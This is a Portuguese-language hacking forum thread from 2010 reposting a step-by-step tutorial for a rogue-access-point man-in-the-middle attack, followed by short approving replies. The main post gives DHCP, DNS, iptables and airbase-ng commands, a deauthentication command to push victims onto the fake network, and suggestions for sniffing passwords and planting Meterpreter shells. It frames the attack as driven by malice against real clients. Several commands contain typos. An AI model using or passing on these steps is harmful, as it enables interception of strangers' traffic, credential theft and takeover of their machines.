Man-In-The-Middle na prática ;)

Iniciado por sleeperthree, 11 de Fevereiro , 2010, 04:24:41 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

sleeperthree


Man-In-The-Middle na prática
autor: FZERO


@sleeperthree~# otimo conteudo e alem de ser muito relevante, o kra escreve com uma claresa muito boa, RECOMENDO!


[..] Muita gente pensa que MITM(Homem-do-meio) é apenas usar o Ettercap e já virou hacker, outros até, pensam que ataques deste tipo não servem de nada.

Infelizmente, esta é a realidade de muitas pessoas que são pseudo-hackers ou até mesmo pseudo-elites.

Vamos lá, um ataque de MITM é quando o hacker se torna um relay entre dois, ou mais, clientes, neste caso, um Acess Point Wireless. Em essência, o hacker se torna um 'tracehop', que é um hop(ponto de passagem, nó).
Ataques MITM são muito usados para Phising, Spoofing e Sniffing. A única desvantagem desta técnica, é que dependendo do modelo OSI, você precisará ter acesso físico ao Acess Point.

Os meios para se explorar clientes usando a técnica do MITM são limitados a dois fatores: sua imaginação e a quantidade de maldade em seu coração. A boa notícia é: pode-se fazer muita pouca coisa se você não tiver maldade na cabeça.

Bom, vamos ao ataque, para executá-lo, você precisará de algumas ferramentas. Existem apenas poucas ferramentas que são realmente essênciais para fazer um MITM, mas para explorá-lo com eficiência, você precisará de muito mais, programar exploits também é bom  :)

A base de um ataque MITM é pelos seguintes programas: airbase-ng(Incluido no aircrack-ng), bind9 e dhcp3-server.

Você pode usar também o Nessus, nmap, wireshark, ettercap, thc-hydra, metasploit, NetworkMiner, wine, cowpatty, nikto e vários outros.

Você também precisará de duas interfaces de rede, uma de entrada e uma de saída. Assegure-se que elas precisam ter suporte a 'modo monitor'. As suas vítimas precisam apenas estar rodando algum cliente wireless  :)

Lembrando sempre que para executar estes passos que estou passando-lhes, você precisa estar rodando um console BASH e no meu caso as interfaces de rede wireless são eth0 e eth1 para não se confundirem.

Você precisa configurar um gateway totalmente funcional apenas uma vez, para isso, entre no arquivo de configuração do seu dhcp, o qual é /etc/default/dhcp3-server, agora, encontre a seguinte linha:
...
INTERFACES=

E coloque a interface que será o seu Acess Point, neste caso, será eth1, salve e saia.

Agora, abra o arquivo /etc/dhcp3/dhcpd.conf e insira as seguintes linhas:
ddns-update-style none;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.250;
option domain-name-servers 10.0.0.1;
option routers 10.0.0.1;
default-lease-time 600;
max-lease-time 7200;
}



Isso fará com que todo mundo que se conectar a você, será colocado na faixa de sub-rede entre 10.0.0.100 e 10.0.0.249. Tendo em mente que você é o 10.0.0.1, e que você tem um servidor DNS em seu computador. O que você terá. Agora, reinicialize o dhcp3-server com o seguinte comando:
    sudo /etc/init.d/dhcp3-server restart

Se você quer ser um elite, você pode colocar uma conexão de loopback que você pode usar para rodar exploits sem precisa de uma outra máquina, abra o arquivo /etc/network/interfaces, DEPOIS DE TER CERTEZA DE QUE TEM UM BACKUP DELE. Adicione as linhas:
auto lo eth1
iface eth1 inet dhcp
iface lo inet loopback


E rode o comando:     sudo /etc/init.d/networking restart

Agora que você tem um servidor DHCP, você precisa ligar e rodar o seu servidor DNS, para isso, usaremos o Bind9.

O Bind9 já vem configurado, então você apenas precisará modificá-lo para seus próprios sites, não farei isto agora para encurtar o post  :)
Agora, execute o comando
    /etc/init.d/bind9 stop

E abra o arquivo /etc/bind/named.conf.options, descomente as linhas a seguir e adicione servidores DNS alternativos, eu uso os do Google, o meu arquivo está assim:
options {
directory "/var/cache/bind";
fowarders { 8.8.8.8;8.8.8.4};
auth-nxdomain no;
listen-on-v6{ any; };
};


Agora, ligue o Bind9 de novo com o comando:
    /etc/init.d/bind9 start


Neste momento, estamos prontos para executar o ataque  ;)

Primeiro de tudo, conecte-se à internet usando a interface eth0, você provavelmente usará o servidor de acesso mais próximo, então, rode os seguintes comando para dar um kill em algumas coisas que podem causar conflitos, e dar poder sobre a interface de Acess Point(eth1):
kill `cat /var/run/dhcp.pid`
killall -9 dhcp3-server dhcpd wireshark ettercap airbase-ng
airmon-ng stop eth1
ifconfig eth1 down
modprobe tun
airbase-ng -e "ESSID" -P -C 30 -v eth1


O "ESSID" é o da rede a qual você está atacando. O parâmetro "-P" faz com que o Acess Point responda à todas as requisições e pedidos, capturando usuários bem mais rápido. O "-C 30" irá mudar os seus pacotes de resposta para enganar usuários, eles entrarão na rede mesmo se o SSID estiver incorreto.
Tenha certeza de que os comandos acima foram executados com sucesso para prosseguir.

Agora, você precisa configurar o seu iptables para o seu Acess Point, perceba que a interface at0 é muito fácil de ser colocado um sniffer junto, tudo o que você precisa fazer é executar os comandos a seguir o mais rápido o possível, para terminar de executá-los antes que muitos clientes tentem se conectar à rede, sugiro que você crie um script em Shell para isso :
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptavles -t nat -A POSTROUTING -o eth0 -j MASQUERADE
ettercap -T -q -p -i at0


Agora você tem um Acess Point totamente funcional, junto de um Sniffer embutido(se você tiver o ettercap instalado, é claro). Você perceberá que não tem muitos clientes se conectando, agora vem a parte divertida  :)
Executaremos um ataque de Deauth(Desautenticação). Use o airodump-ng ou o ksmet para encontrar clientes e conseguir informações dos mesmos, com estas informações em mãos, execute o Deauth:
    aireplay-ng -e "ESSID-ALVO" -a "MAC-DO-Acess-Point-ALVO" -c "MAC-Do-cliente-ALVO" --deauth 1 eth3

Se tudo correr bem, você poderá executar o comando a seguir para ver os clientes estão relativamente inativos. Se acontecer de ninguém re-entrar na rede logo em seguida, então eles possuem uma boa rede, e você precisará abusar um pouco da sua engenharia social para conseguir que eles se reconectem à rede. Espero que você tenha um ótimo "plano B" e inteligênicia e técnica o suficiente para isso.
Este é o comando para ver os clientes:
echo > '/var/state/dhcp/dhcpd.leases'
ou
sudo dhclient


Se tudo correu bem até aqui, então você está em uma posição perfeita para 'brincar' com os clientes  ;)

Agora vai da sua imaginação, você pode usar um sniffer para capturar senhas, por exemplo o Wireshark ou Ettercap, usando filtros específicos, lembrem-se sempre que você precisará 'sniffar' a interface at0.

Usando o Network Miner, vocês podem até mesmo recriar a maioria dos arquivos que as pessoas baixam.

Você pode colocar executáveis em seus clientes, usando o Network Miner ou algum filtro do Ettercap, ou até mesmo copiando e colando nas pastas compartilhadas do windows ou até mesmo algum exploit de Iframe  :)

Colocando e executando alguma payload já compilada, o Meterpreter por exemlpo, você terá acesso a uma Shell em seu cliente.

"O resto nasce daí"

Simples assim  ;)

Este é um exemplo muito claro e real de um ataque de MITM, é claro, isto é apenas o básico, como já disse no começo do post, existem infinitas possibilidades de execuções ou ataques, agora que você já sabe como fazer, basta apenas ter imaginação  :P


KEst

Metade do seu texto está faltando =/
Essa porra de ter mais de um layout quebra as pernas ....
¬¬'

Campanha Converta-se a Gnu is Not Unix/Linux

sleeperthree

@kest
pelo que entendi você não usa o tema padrão do darkers...
então acho que o problema é seu! kkk

Reeves

vlw por postar, pelo visto vc gostou mesmo  :)

realmente está muito bem escrito, muito bom!
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Nv0

#4
Legal.

kVis

Queria apresentar o voces o MetaSploit que originou uma porção do ataque ao Google na Operação Aurora.

http://www.youtube.com/watch?v=53Yv-xAdstc

Com o qual é possível explorar uma vulnerabilidade no IE6 e IE7, é importante se queremos alterar algumas configurações para direcionar o trafego de alguma maquina cobaia para nosso Servidor Proxy que interceptaria um trafego a fim de estudo.

Outra opção interessante que pode ser aplicada em alguns ambientes com equipamentos Wireless antigos, é atraves de algumas ferramentas que não sejam detectadas por quem encaminha o trafego.

http://www.youtube.com/watch?v=N86xJpna9Js

Good Luck Magos!